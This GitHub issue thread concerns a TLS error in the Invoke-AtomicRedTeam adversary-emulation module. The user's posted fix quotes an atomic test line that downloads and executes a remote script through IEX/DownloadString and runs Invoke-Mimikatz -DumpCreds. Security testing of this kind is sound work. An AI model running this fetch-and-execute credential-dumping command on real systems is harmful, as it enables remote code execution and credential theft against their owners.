redcanaryco / invoke-atomicredteam

Invoke-AtomicRedTeam is a PowerShell module to execute tests as defined in the [atomics folder](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics) of Red Canary's Atomic Red Team project.
MIT License
815 stars 193 forks source link

Error - "Could not create SSL\TLS secure Tunnel" #55

Closed WinterIsCommin closed 3 years ago

WinterIsCommin commented 3 years ago

Hi, after a week of perfectly fine using invoke-atomic with no issues, I encountered today with an unexpected error, "Could not create SSL\TLS secure Tunnel", I found some work arounds such as adding the following line in PowerShell

It seemed to work when I re-downloaded Invoke Atomics from github, but after installing and attempting to execute the test it stilled gave me an error. I could attempt to add the line also in the executed script but I don't know which file will include all tests.

Please help image

WinterIsCommin commented 3 years ago

Fixed it by adding the following command before the web request For Example, file T1059.001.yaml

executor: command: | powershell.exe "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12" ; "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"